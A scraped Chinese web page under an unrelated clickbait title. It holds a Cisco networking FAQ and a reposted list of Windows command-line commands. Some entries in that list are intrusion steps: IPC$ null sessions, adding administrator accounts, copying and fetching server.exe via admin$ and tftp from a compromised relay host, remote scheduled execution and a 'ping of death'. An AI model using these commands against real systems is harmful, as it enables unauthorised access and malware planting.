偶看新闻被一只蜜蜂蛰了怎么办:网络工程基础知识
来源:百度文库 编辑:偶看新闻 时间:2024/05/05 00:08:33
路由器问题: 1、什么时候使用多路由协议? 当两种不同的路由协议要交换路由信息时,就要用到多路由协议。当然,路由再分配也可以交换路由信息。下列情况不必使用多路由协议: 从老版本的内部网关协议( Interior Gateway Protocol,I G P)升级到新版本的I G P。 你想使用另一种路由协议但又必须保留原来的协议。 你想终止内部路由,以免受到其他没有严格过滤监管功能的路由器的干扰。 你在一个由多个厂家的路由器构成的环境下。 什么是距离向量路由协议? 距离向量路由协议是为小型网络环境设计的。在大型网络环境下,这类协议在学习路由及保持路由将产生较大的流量,占用过多的带宽。如果在9 0秒内没有收到相邻站点发送的路由选择表更新,它才认为相邻站点不可达。每隔30秒,距离向量路由协议就要向相邻站点发送整个路由选择表,使相邻站点的路由选择表得到更新。这样,它就能从别的站点(直接相连的或其他方式连接的)收集一个网络的列表,以便进行路由选择。距离向量路由协议使用跳数作为度量值,来计算到达目的地要经过的路由器数。 例如,R I P使用B e l l m a n - F o r d算法确定最短路径,即只要经过最小的跳数就可到达目的地的线路。最大允许的跳数通常定为1 5。那些必须经过1 5个以上的路由器的终端被认为是不可到达的。 距离向量路由协议有如下几种: IP RIP、IPX RIP、A p p l e Talk RT M P和I G R P。 什么是链接状态路由协议? 链接状态路由协议更适合大型网络,但由于它的复杂性,使得路由器需要更多的C P U资源。它能够在更短的时间内发现已经断了的链路或新连接的路由器,使得协议的会聚时间比距离向量路由协议更短。通常,在1 0秒钟之内没有收到邻站的H E L LO报文,它就认为邻站已不可达。一个链接状态路由器向它的邻站发送更新报文,通知它所知道的所有链路。它确定最优路径的度量值是一个数值代价,这个代价的值一般由链路的带宽决定。具有最小代价的链路被认为是最优的。在最短路径优先算法中,最大可能代价的值几乎可以是无限的。 如果网络没有发生任何变化,路由器只要周期性地将没有更新的路由选择表进行刷新就可以了(周期的长短可以从3 0分钟到2个小时)。 链接状态路由协议有如下几种: IP OSPF、IPX NLSP和I S - I S。 一个路由器可以既使用距离向量路由协议,又使用链接状态路由协议吗? 可以。每一个接口都可以配置为使用不同的路由协议;但是它们必须能够通过再分配路由来交换路由信息。(路由的再分配将在本章的后面进行讨论。) 2、什么是访问表? 访问表是管理者加入的一系列控制数据包在路由器中输入、输出的规则。它不是由路由器自己产生的。访问表能够允许或禁止数据包进入或输出到目的地。访问表的表项是顺序执行的,即数据包到来时,首先看它是否是受第一条表项约束的,若不是,再顺序向下执行;如果它与第一条表项匹配,无论是被允许还是被禁止,都不必再执行下面表项的检查了。 每一个接口的每一种协议只能有一个访问表。 支持哪些类型的访问表? 一个访问表可以由它的编号来确定。具体的协议及其对应的访问表编号如下: ◎I P标准访问表编号:1~9 9 ◎I P扩展访问表编号:1 0 0~1 9 9 ◎I P X标准访问表编号:8 0 0~8 9 9 ◎I P X扩展访问表编号:1 0 0 0~1 0 9 9 ◎AppleTa l k访问表编号:6 0 0~6 9 9 提示在Cisco IOS Release11.2或以上版本中,可以用有名访问表确定编号在1~199的访问表。 如何创建IP标准访问表? 一个I P标准访问表的创建可以由如下命令来完成: Access-list access list number {permit | deny} source [source-mask] 在这条命令中: ◎access list number:确定这个入口属于哪个访问表。它是从1到9 9的数字。 ◎permit | deny:表明这个入口是允许还是阻塞从特定地址来的信息流量。 ◎source:确定源I P地址。 ◎s o u r c e - m a s k:确定地址中的哪些比特是用来进行匹配的。如果某个比特是"1",表明地址中该位比特不用管,如果是"0"的话,表明地址中该位比特将被用来进行匹配。可以使用通配符。 以下是一个路由器配置文件中的访问表例子: Router# show access-lists Standard IP access list 1 deny 204.59.144.0, wildcard bits 0.0.0.255 ermit any 3、什么时候使用路由再分配? 路由再分配通常在那些负责从一个自治系统学习路由,然后向另一个自治系统广播的路由器上进行配置。如果你在使用I G R P或E I G R P,路由再分配通常是自动执行的。 4、什么是管理距离? 管理距离是指一种路由协议的路由可信度。每一种路由协议按可靠性从高到低,依次分配一个信任等级,这个信任等级就叫管理距离。对于两种不同的路由协议到一个目的地的路由信息,路由器首先根据管理距离决定相信哪一个协议。 6、如何配置再分配? 在进行路由再分配之前,你必须首先: 1) 决定在哪儿添加新的协议。 2) 确定自治系统边界路由器(ASBR)。 3) 决定哪个协议在核心,哪个在边界。 4) 决定进行路由再分配的方向。 可以使用以下命令再分配路由更新(这个例子是针对OSPF的): router(config-router)#redistribute protocol [process-id] [metric metric - value ] [metric-type type - value ] [subnets] 在这个命令中: ◎protocol:指明路由器要进行路由再分配的源路由协议。 主要的值有: bgp、eqp、igrp、isis、ospf、static [ ip ]、connected和rip。 ◎process-id:指明OSPF的进程ID。 ◎metric:是一个可选的参数,用来指明再分配的路由的度量值。缺省的度量值是0。 7、为什么确定毗邻路由器很重要? 在一个小型网络中确定毗邻路由器并不是一个主要问题。因为当一个路由器发生故障时,别的路由器能够在一个可接受的时间内收敛。但在大型网络中,发现一个故障路由器的时延可能很大。知道毗邻路由器可以加速收敛,因为路由器能够更快地知道故障路由器,因为hello报文的间隔比路由器交换信息的间隔时间短。 使用距离向量路由协议的路由器在毗邻路由器没有发送路由更新信息时,才能发现毗邻路由器已不可达,这个时间一般为10~90秒。而使用链接状态路由协议的路由器没有收到hello报文就可发现毗邻路由器不可达,这个间隔时间一般为10秒钟。 距离向量路由协议和链接状态路由协议如何发现毗邻路由器? 使用距离向量路由协议的路由器要创建一个路由表(其中包括与它直接相连的网络),同时它会将这个路由表发送到与它直接相连的路由器。毗邻路由器将收到的路由表合并入它自己的路由表,同时它也要将自己的路由表发送到它的毗邻路由器。使用链接状态路由协议的路由器要创建一个链接状态表,包括整个网络目的站的列表。在更新报文中,每个路由器发送它的整个列表。当毗邻路由器收到这个更新报文,它就拷贝其中的内容,同时将信息发向它的邻站。在转发路由表内容时没有必要进行重新计算。 注意使用IGRP和EIGRP的路由器广播hello报文来发现邻站,同时像OSPF一样交换路由更新信息。EIGRP 为每一种网络层协议保存一张邻站表,它包括邻站的地址、在队列中等待发送的报文的数量、从邻站接收或向邻站发送报文需要的平均时间,以及在确定链接断开之前没有从邻站收到任何报文的时间。 8、什么是自治系统? 一个自治系统就是处于一个管理机构控制之下的路由器和网络群组。它可以是一个路由器直接连接到一个LAN上,同时也连到Internet上;它可以是一个由企业骨干网互连的多个局域网。在一个自治系统中的所有路由器必须相互连接,运行相同的路由协议,同时分配同一个自治系统编号。自治系统之间的链接使用外部路由协议,例如B G P。 9、什么是BGP? BGP(Border GatewayProtocol)是一种在自治系统之间动态交换路由信息的路由协议。一个自治系统的经典定义是在一个管理机构控制之下的一组路由器,它使用IGP和普通度量值向其他自治系统转发报文。 在BGP中使用自治系统这个术语是为了强调这样一个事实:一个自治系统的管理对于其他自治系统而言是提供一个统一的内部选路计划,它为那些通过它可以到达的网络提供了一个一致的描述。 10、BGP支持的会话种类? BGP相邻路由器之间的会话是建立在TCP协议之上的。TCP协议提供一种可靠的传输机制,支持两种类型的会话: o 外部BGP(EBGP):是在属于两个不同的自治系统的路由器之间的会话。这些路由器是毗邻的,共享相同的介质和子网。 o 内部BGP(IBGP):是在一个自治系统内部的路由器之间的会话。它被用来在自治系统内部协调和同步寻找路由的进程。BGP路由器可以在自治系统的任何位置,甚至中间可以相隔数个路由器。 注意"初始的数据流的内容是整个BGP路由表。但以后路由表发生变化时,路由器只传送变化的部分。BGP不需要周期性地更新整个路由表。因此,在连接已建立的期间,一个BGP发送者必须保存有当前所有同级路由器共有的整个BGP路由表。BGP路由器周期性地发送Keep Alive消息来确认连接是激活的。当发生错误或特殊情况时,路由器就发送Notification消息。当一条连接发生错误时,会产生一个 notification消息并断开连接。"- 来自RFC11654、BGP操作。 11、BGP允许路由再分配吗? 允许。因为BGP主要用来在自治系统之间进行路由选择,所以它必须支持RIP、OSPF和 IGRP的路由选择表的综合,以便将它们的路由表转入一个自治系统。BGP是一个外部路由协议,因此它的操作与一个内部路由协议不同。在BGP中,只有当一条路由已经存在于IP路由表中时,才能用NETWORK命令在BGP路由表中创建一条路由。 12、如何显示在数据库中的所有BGP路由? 要显示数据库中的所有BGP路由,只需在EXEC命令行下输入: how ip bgp paths 这个命令的输出可能是: Address Hash Refcount MetricPath 0 x 2 9 7 A 9 C 0 2 0 i 13、什么是水平分割? 水平分割是一种避免路由环的出现和加快路由汇聚的技术。由于路由器可能收到它自己发送的路由信息,而这种信息是无用的,水平分割技术不反向通告任何从终端收到的路由更新信息,而只通告那些不会由于计数到无穷而清除的路由。 14、路由环是如何产生的? 由于网络的路由汇聚时间的存在,路由表中新的路由或更改的路由不能够很快在全网中稳定,使得有不一致的路由存在,于是会产生路由环。 15、什么是度量值? 度量值代表距离。它们用来在寻找路由时确定最优路由。每一种路由算法在产生路由表时,会为每一条通过网络的路径产生一个数值(度量值),最小的值表示最优路径。度量值的计算可以只考虑路径的一个特性,但更复杂的度量值是综合了路径的多个特性产生的。一些常用的度量值有: ◎跳步数:报文要通过的路由器输出端口的个数。 ◎Ticks:数据链路的延时(大约1/18每秒)。 ◎代价:可以是一个任意的值,是根据带宽,费用或其他网络管理者定义的计算方法得到的。 ◎带宽:数据链路的容量。 ◎时延:报文从源端传到目的地的时间长短。 ◎负载:网络资源或链路已被使用的部分的大小。 ◎可靠性:网络链路的错误比特的比率。 ◎最大传输单元(MTU):在一条路径上所有链接可接受的最大消息长度(单位为字节)。 IGRP使用什么类型的路由度量值?这个度量值由什么组成? IGRP使用多个路由度量值。它包括如下部分: ◎带宽:源到目的之间最小的带宽值。 ◎时延:路径中积累的接口延时。 ◎可靠性:源到目的之间最差的可能可靠性,基于链路保持的状态。 ◎负载:源到目的之间的链路在最坏情况下的负载,用比特每秒表示。 ◎MTU:路径中最小的M T U值。 16、度量值可以修改或调整吗? 加一个正的偏移量。这个命令的完整结构如下:可以使用OFFSET-LIST ROUTER子命令 为访问表中的网络输入和输出度量值添加一个正的偏移量。 offset-list {in|out} offset [access-list] no offset-list {in|out} offset [access-list] 如果参数LIST的值是0,那么OFFSET参数将添加到所有的度量值。如果OFFSET的值是0,那么就没有任何作用。对于IGRP来说,偏移量的值只加到时延上。这个子命令也适用于RIP和hello路由协议。 使用带适当参数的NO OFFSET- LIST命令可以清除这个偏移量。 在以下的例子中,一个使用IGRP的路由器在所有输出度量值的时延上加上偏移量10: offset-list out 10 下面是一个将相同的偏移量添加到访问表121上的例子: offset-list out 10 121 17、每个路由器在寻找路由时需要知道哪五部分信息? 所有的路由器需要如下信息为报文寻找路由: ◎目的地址:报文发送的目的主机。 ◎邻站的确定:指明谁直接连接到路由器的接口上。 ◎路由的发现:发现邻站知道哪些网络。 ◎选择路由:通过从邻站学习到的信息,提供最优的(与度量值有关)到达目的地的路径。 ◎保持路由信息:路由器保存一张路由表,它存储所知道的所有路由信息。 18、Cisco路由器支持的路由协议与其他厂家设备的协议兼容吗? 除了IGRP和EIGRP,Cisco路由器支持的所有路由协议都与其他厂家实现的相同协议兼容。IGRP和EIGRP是Cisco的专利产品。 19、RIP路由表的表项的信息说明了什么? RIP路由表的每一个表项都提供了一定的信息,包括最终目的地址、到目的地的下一跳地址和度量值。这个度量值表示到目的终端的距离(跳步数)。其他的信息也可以包括。 路由器问题补充: 1、Cisco3600系列路由器目前是否支持广域网接口卡WIC-2T和WIC-2A/S? Cisco3600系列路由器在12.007XK及以上版本支持WIC-2T和WIC-2A/S这两种广域网接口卡。 但是需要注意的是: 只有快速以太网混合网络模块能够支持这两种广域网接口卡。 支持这两种接口卡的网络模块如下所示: NM-1FE2W, NM-2FE2W, NM-1FE1R2W, NM-2W。 而以太网混合网络模块不支持,如下所示: NM-1E2W,NM-2E2W, NM1E1R2W。 20、Cisco3600系列路由器的NM(4A/S,NM(8A/S网络模块和WIC(2A/S广域网接口卡支持的最大异/同步速率各是多少? 这些网络模块和广域网接口卡既能够支持异步,也能够支持同步。支持的最大异步速率均为115.2Kbps,最大同步速率均为128Kbps。 21、WIC-2T与WIC-1T的电缆各是哪种? WIC-1T:DB60转V35或RS232、 449等电缆。 如:CAB-V35-MT。 WIC-2T:SMART型转V35或RS232、 449等电缆。 如: CAB-SS-V35-MT。 22、Cisco 7000系列上的MCE1与Cisco 2600/3600上的E1、 CE1有什么区别? Cisco 7000上的MCE1可配置为E1、 CE1, 而Cisco 2600/3600上的E1、 CE1仅支持自己的功能。 23、Cisco 2600系列路由器,是否支持VLAN间路由,对IOS软件有何需求? Cisco(2600系列路由器中,只有Cisco2620和Cisco2621可以支持VLAN间的 路由(百兆端口才支持VLAN间路由)。并且如果支持VLAN间路由,要求IOS软件必须包括IP Plus特性集。 24、Cisco3660路由器与3620/3640路由器相比在硬件上有那些不同? 不同点如下: * Cisco3660路由器基本配置包括1或2个10/100M自适应快速以太网接口;而Cisco3620/3640基本配置中不包括以太网接口。 * Cisco3660路由器支持网络模块热插拔,而 Cisco3620/3640不支持网络模块热插拔。 * Cisco3660的冗余电源为内置, 而Cisco3620/3640的冗余电源为外置的。 25、为什么3640不能识别NM-1FE2W? 需要将IOS升级到12.0.7T 交换机问题 关于交换机问题: 1、Catalyst 35500XL/2950XL的堆叠是如何实现的? a. 需要使用专门的堆叠电缆,1米长或50厘米长(CAB-GS-1M或CAB-GS-50CM)以及专门的千兆堆叠卡GigaStack GBIC (WS-X3550-XL) (该卡已含CAB-GS-50CM 堆叠电缆)。 . 可以选用2种堆叠方法:菊花链法(提供1G的带宽)或点对点法(提供 2G的带宽)。 c. 2种方法都可以做备份。 d. 菊花链法最多可支持9台交换机的堆叠, 点对点法最多可支持8台。 2、Catalyst 3550 XL系列交换机做堆叠时,是否支持冗余备份? Catalyst3550XL系列交换机的堆叠有两种实现方法:菊花链方式和点到点方式。 当使用菊花链方式时,堆叠的交换机依次连接,交换机之间可以达到1Gbps的传输带宽; 当使用点到点方式时,需要一台单独的 Catalyst3508G-XL交换机, 其余的交换机通过堆叠GBIC卡和堆叠线缆与3508G相连,这种方法最大可以达到2Gbps的全双工传输带宽。 这两种方法都分别支持堆叠的冗余连接。当使用菊花链连接方式时,冗余连接是通过将最上面的交换机与最下面的交换机用堆叠线缆相连接完成的。而当使用点到点连接时,是通过使用第2台3508交换机来完成的。 26、 Catalyst3550 XL的一个千兆口使用堆叠卡做堆叠后, 另外一个千兆口是否可以连接千兆的交换机或千兆的服务器? 可以。需使用1000Base-SX GBIC或1000Base-LX/LH GBIC。 27、 Ethernet Channel Tech. 可以应用在什么网络设备之间?如何使用? 可以应用在交换机之间, 交换机和路由器之间,交换机和服务器之间 可以将2个或4个10/100Mbps或1000Mbps端口使用 Ethernet Channel Tech.,达到最多400M (10/100Mbps端口)、4G(1000Mbps端口) 或800M(10/100Mbps端口)、8G(1000Mbps端口) 的带宽。 28、Ethernet Channel Technology有什么作用? 增加带宽,负载均衡,线路备份 29、 当端口设置成 Ethernet Channel时,如何选择线路? 根据数据帧的以太网源地址和目的地址最后1位或2位做或运算,决定从哪条链路输出。对于路由器来说是根据网络地址做或运算,以决定链路的输出。 30、Ethernet Channel Technology 与 PAgP (Port Aggregation Protocol 的区别? PAgP是 Ethernet Channel的增强版,它支持在 Ethernet Channel 上的 Spanning Tree Protocol和Uplink Fast,并支持自动配置 Ethernet Channel 的捆绑。 最少需要的电源数 1 2 包转发速率 18Mpps 18Mpps 背板带宽 24Gbps 60Gbps 31、Catalyst4000系列是否支持ISL? 从Supervisor Engine Software Release 5.1开始支持。 32、Catalyst4000交换机的冗余电源选项4008/2和4008/3有何区别? Catalyst4003交换机机箱上有两个电源插槽,出厂时本身自带一个电源,4008/2是专为其定制的冗余电源。Catalyst4006的机箱上有三个电源插槽,出厂时带有2个电源供电,4008/3是为其定制的专用冗余电源。 33、Catalyst 4006的三层交换模块是否不含以太网端口? 不,Catalyst4006的三层交换模块含有32个10/100自适应端口和2个千兆端口。 在4003上使用时可替代原有的WS-X4232-GB-RJ模块, 从而不影响网络结构。 34、Catalyst 4000系列模块化交换机使用千兆交换模块时, 如何选用目前存在的两种交换模块(产品编号如下)? WS-X4306-GB Catalyst 4000 Gigabit Ethernet Module, 6-Ports (GBIC) WS-X4418-GB Catalyst 4000 GE Module, Server Switching 18-Ports (GBIC) 这两个模块的使用环境不同 WS-X4306-GB是一个6口的千兆交换模块,每个端口独占千兆的带宽,适合做网络的主干,用来连接具有千兆接口的交换机;也可以与具有千兆网卡的服务器相连。 WS-X4418-GB 是一个18口的千兆交换模块,其中有两个口是独占千兆的带宽,另外16个口共享8G的全双工的带宽,但每个端口可以突发到千兆。此模块适合在服务器比较集中的地方连接千兆的服务器,而不适合连接网络主干。 35、Catalyst 6000系列的背板带宽和包转发速率各为多少? Catalyst 6500系列的背板带宽可扩展到256Gbps, 包转发速率可扩展到150Mpps; Catalyst 6000系列作为一个经济有效的解决方案可提供到32Gbps的背板带宽和15Mpps的包转发速率。 36、Catalyst 6000系列的MSFC 要求多少M DRAM ? Catalyst 6000系列IOS软件存放在MSFC里, MSFC要求有128M DRAM。 缺省配置已含128M DRAM。 37、Catalyst 6000系列上的插槽是否有限制? 除第一个插槽专用于引擎, 第二个插槽可用于备份引擎或线卡, 其它插槽都用于线卡。 38、Catalyst 6000系列有几种引擎? Catalyst 6000系列的引擎分为Supervisor Engine 1和Supervisor Engine 1A两种, 其中 Supervisor Engine 1A 有两个特定的备份引擎。其型号分别如下: 型号 描述 WS-X6K-SUP1-2GE Catalyst 6000 Supervisor Engine1引擎 含两个千兆端口(需购GBIC) WS-X6K-SUP1A-2GE Catalyst 6000 Supervisor Engine1A引擎 加强的QOS特性, 含两个千兆端口(需购GBIC) WS-X6K-SUP1A-PFC Catalyst 6000 Supervisor Engine1A引擎 含两个千兆端口(需购GBIC)和PFC卡 WS-X6K-S1A-PFC/2 Catalyst 6000 Supervisor Engine1A冗余引擎 含两个千兆端口(需购GBIC)和PFC卡 WS-X6K-SUP1A-MSFC Catalyst 6000 Supervisor Engine1A引擎 含两个千兆端口(需购GBIC)和MSFC、 PFC卡 WS-X6K-S1A-MSFC/2 Catalyst 6000 Supervisor Engine1A冗余引擎, 含两个千兆端口(需购GBIC)和MSFC、 PFC卡 39、Catalyst 6000系列上备份引擎与主引擎必须是一致的吗? 是的。 Catalyst 6000系列的备份引擎与主引擎必须是一致的, 例如, 不能将不带MSFC&PFC的引擎给带MSFC&PFC的引擎作备份。 另外, WS-X6K-SUP1A-PFC 和 WS-X6K-SUP1A-MSFC有专门的备份引擎。 主、备引擎的对应关系如下: 主引擎 备份引擎 WS-X6K-SUP1-2GE WS-X6K-SUP1-2GE WS-X6K-SUP1A-2GE WS-X6K-SUP1A-2GE WS-X6K-SUP1A-PFC WS-X6K-S1A-PFC/2 WS-X6K-SUP1A-MSFC WS-X6K-S1A-MSFC/2 40、Catalyst 6000系列支持的路由协议有哪些? Catalyst 6000系列支持的路由协议有:OSPF, IGRP, EIGRP, BGP4, IS-IS, RIP和RIP II; 对于组播PIM支持sparse和dense两种模式; 支持的非 IP 路由协议有: NLSP, IPX RIP/SAP, IPX EIGRP, RTMP, Apple Talk EIGRP和DECnet Phase IV和V。 41、Catalyst 6000系列支持的网络协议有哪些? MSM上支持 6Mpps 的 IP、 IP 组播和 IPX 。 引擎上的MSFC 支持 15Mpps的 IP、 IP 组播、IPX以及 AppleTalk、 VINEs、 DECnet. 42、Catalyst6000上若引擎为SUP-1A-2GE, 怎么实现三层交换的功能? 用MSM实现。 6000上只有含有MSFC的引擎才能通过MSFC实现三层交换功能, 在6000上, MSFC是不能单独订购的。 43、Catalyst? 6000交换机和Catalyst? 6500交换机有何区别?6000交换机是否可以升级到6500交换机? Catalyst? 6000系列交换机的背板带宽为32G,而6500系列交换机的背板带宽最大可以扩展到256G。由于这两个系列的交换机使用的背板总线结构不同,所以6000交换机不能升级到6500系列交换机。 但这两个系列交换机使用相同的交换模块。 44、Catalyst3508G是否也可以同Catalyst3524一样采用菊花链堆叠模式? 完全可以。 45、在交换机之间配置Uplink-Fast时,是否需要关闭原有Spanning-Tree选项? 不需要,Uplink-Fast实际上使用的是一种简化的Spanning-Tree算法, 与标准的Spanning-Tree兼容,因此不需关闭该功能 crazy08 发表于 >2006-11-3 8:51:28 保存该日志到本地 [全文] [评论] [引用] [推荐] [档案] [推给好友] [收藏到网摘] 2006-11-3 DOS命令大全(经典收藏) [转] net use \\ip\ipc$ " " /user:" " 建立IPC空链接 net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接 net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H: net use h: \\ip\c$ 登陆后映射对方C:到本地为H: net use \\ip\ipc$ /del 删除IPC链接 net use h: /del 删除映射对方到本地的为H:的映射 net user 用户名 密码 /add 建立用户 net user guest /active:yes 激活guest用户 net user 查看有哪些用户 net user 帐户名 查看帐户的属性 net localgroup administrators 用户名 /add 把"用户"添加到管理员中使其具有管理员权限,注意:administrator后加s用复数 net start 查看开启了哪些服务 net start 服务名 开启服务;(如:net start telnet, net start schedule) net stop 服务名 停止某服务 net time \\目标ip 查看对方时间 net time \\目标ip /set 设置本地计算机时间与"目标IP"主机的时间同步,加上参数/yes可取消确认信息 net view 查看本地局域网内开启了哪些共享 net view \\ip 查看对方局域网内开启了哪些共享 net config 显示系统网络设置 net logoff 断开连接的共享 net pause 服务名 暂停某服务 net send ip "文本信息" 向对方发信息 net ver 局域网内正在使用的网络连接类型和信息 net share 查看本地开启的共享 net share ipc$ 开启ipc$共享 net share ipc$ /del 删除ipc$共享 net share c$ /del 删除C:共享 net user guest 12345 用guest用户登陆后用将密码改为12345 net password 密码 更改系统登陆密码 netstat -a 查看开启了哪些端口,常用netstat -an netstat -n 查看端口的网络连接情况,常用netstat -an netstat -v 查看正在进行的工作 netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况) netstat -s 查看正在使用的所有协议使用情况 nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写 tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:"-w数字"用于设置超时间隔。 ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:"-l[空格]数据包大小";"-n发送数据次数";"-t"指一直ping。 ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数"/all"显示全部配置信息 tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内) kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内) del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、 /A-A表示删除除只读、隐藏、系统、存档以外的文件。例如"DEL/AR *.*"表示删除当前目录下所有只读文件,"DEL/A-S *.*"表示删除当前目录下除系统文件以外的所有文件 #2 二: del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同) move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令 at id号 开启已注册的某个计划任务 at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止 at id号 /delete 停止某个已注册的计划任务 at 查看所有的计划任务 at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机 finger username @host 查看最近有哪些用户登陆 telnet ip 端口 远和登陆服务器,默认端口为23 open ip 连接到IP(属telnet登陆后的命令) telnet 在本机上直接键入telnet 将进入本机的telnet copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件 copy c:\srv.exe \\ip\admin$ 复制本地c:\srv.exe到对方的admin下 cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件 copy \\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C: xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件 tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后,将"IP"的server.exe 下载到目标主机c:\server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送 tftp -i 对方IP put c:\server.exe 登陆后,上传本地c:\server.exe至主机 ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进); 默认为ASCII格式传送(文本文件时) route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息 start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令 mem 查看cpu使用情况 attrib 文件名(目录名) 查看某文件(目录)的属性 attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性 dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间 date /t 、 time /t 使用此参数即"DATE/T"、"TIME/T"将只显示当前日期和时间,而不必输入新日期和时间 set 指定环境变量名称=要指派给变量的字符 设置环境变量 set 显示当前所有的环境变量 set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量 pause 暂停批处理程序,并显示出:请按任意键继续.... if 在批处理程序中执行条件处理(更多说明见if命令及变量) goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:":start"标签) call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?) for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量) echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置 echo 信息 在屏幕上显示出信息 echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中 findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello find 文件名 查找某文件 title 标题名字 更改CMD窗口标题名字 color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白 prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为:EntSky\ #3 三: ver 在DOS窗口下显示版本信息 winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名) format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS md 目录名 创建目录 replace 源文件 要替换文件的目录 替换文件 ren 原文件名 新文件名 重命名文件名 tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称 type 文件名 显示文本文件的内容 more 文件名 逐屏显示输出文件 doskey 要锁定的命令=字符 doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir= taskmgr 调出任务管理器 chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误 tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口 exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe path 路径\可执行文件的文件名 为可执行文件设置一个路径。 cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /? regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示; regedit /e 注册表文件名 导出注册表 cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名erm 替换指定用户的访问权限;/G 用户名erm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。 cacls 文件名 查看文件的访问用户权限列表 REM 文本内容 在批处理文件中添加注解 netsh 查看或更改本地网络配置情况 #4 四: IIS服务命令: iisreset /reboot 重启win2k计算机(但有提示系统将重启信息出现) iisreset /start或stop 启动(停止)所有Internet服务 iisreset /restart 停止然后重新启动所有Internet服务 iisreset /status 显示所有Internet服务状态 iisreset /enable或disable 在本地系统上启用(禁用)Internet服务的重新启动 iisreset /rebootonerror 当启动、停止或重新启动Internet服务时,若发生错误将重新开机 iisreset /noforce 若无法停止Internet服务,将不会强制终止Internet服务 iisreset /timeout Val在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。 FTP 命令: (后面有详细说明内容) ftp的命令行格式为: ftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息。-d 使用调试方式。 -n 限制ftp的自动登录,即不使用.netrc文件。-g 取消全局文件名。 help [命令] 或 ?[命令] 查看命令说明 bye 或 quit 终止主机FTP进程,并退出FTP管理方式. pwd 列出当前远端主机目录 put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中 get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中 mget [remote-files] 从远端主机接收一批文件至本地主机 mput local-files 